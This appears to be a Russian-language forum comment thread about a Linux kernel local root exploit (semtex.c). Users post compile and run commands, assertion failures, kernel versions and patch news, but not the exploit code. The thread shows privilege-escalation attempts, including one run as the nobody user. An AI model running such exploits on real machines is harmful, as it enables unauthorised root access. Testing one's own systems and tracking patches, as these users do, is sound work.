В списке нету сабжевой уязвимости. Это значит, что ни еще не закрыли ее?
Почему там есть какие-то уязвимости от 2012 года? Уже давно должны быть закрыты.
Для wheezy вообще обновлений нет.
Надо на убунту переходит, там хоть сабжевый эксплоит не пашет.
exploit@aquinas ~ $ gcc semtex.c -o semtex
exploit@aquinas ~ $ ./semtex
semtex: semtex.c:63: main: Assertion `(map = mmap((void*)0x380000000, 0x010000000, 3, 0x32, 0,0)) == (void*)0x380000000' failed.
Аварийный останов
exploit@aquinas ~ $ uname -a
Linux aquinas 3.8.4-hardened #1 SMP Tue Mar 26 14:42:26 MSK 2013 x86_64 Intel(R) Core(TM)2 Quad CPU Q9550 @ 2.83GHz GenuineIntel GNU/LinuxЧе то не работает :(
gcc -O2
openSUSE 12.3
$ uname -r
3.4.11-2.16-desktopПолучился pagefault в ядре и поехали XRandr'овские дисплеи, Oops кильнул процесс :(
У меня не работает почему-то:$ gcc -O2 semtex.c -o test
$ ./test
Assertion failed: ((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE), function main, file semtex.c, line 63.
zsh: abort (core dumped) ./test
У меня тоже не рабочий совсем:
$ gcc -O2 semtex.c
$ ./a.out
Assertion failed: ((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE), function main, file semtex.c, line 63.
Abort trap: 6
Работает...
Linux localhost.localdomain 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
А мне пофиг )
magic@main ~/src $ gcc 1.c
magic@main ~ $ sudo su
[sudo] password for magic:
main # cd src
main src # uname -r
3.2.0-37-generic
main src # id nobody
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
main src # su nobody
$ pwd
/home/magic/src
$ a.out
sh: 4: a.out: not found
$ ./a.out
Killed
$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
$ ls
1.c a.out
$
Что то не сработало.
fedora 18./a.out
a.out: semtex.c:51: sheep: Assertion `!close(fd)' failed.
Аварийный останов (core dumped)не работает
Как всегда 0-day уязвимость сработала только в случае удачного расположения звезд и галактик в момент запуска. Да нам еще работать и работать толи дело в винде если есть дырка то она есть у всех. щитильней надо товарищи щительней.
ерунда!
Не работает эксплоит.
На интеловой платформе проверил на ядрах:
3.2.0-41-generic-pae #66-Ubuntu
2.6.32-358.6.1.el6.centos.plus.x86_64Результат:
exploit: exploit.c:51: sheep: Assertion `!close(fd)' failed.
Aborted (core dumped)
и
2.6.37-3.x x86_64
sd@fucksheep.org 2010
root_exp: root_exploit.c:81: main: Assertion `p = memmem(code, 1024, &needle, 8)' failed.
Aborted (core dumped)А еще ARM юзерам беспокоиться нечего. Эксплоит не собирается вообще, из-за ассемблерных интеловых вставок.
Так что я думаю это все фейк.
Дайте угадаю. Вы тоже собирали без -O2?
В дебиане 7 пофиксено. Итого 2 дня
Автор новости: linux must _RIP_
А казачок то засланный.
не работаетLinux minty 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
> ps. ядро последнее из оф. репозитория centos
> ps2. жопа.уже доступно исправление 2.6.32-358.6.2.el6
Обновился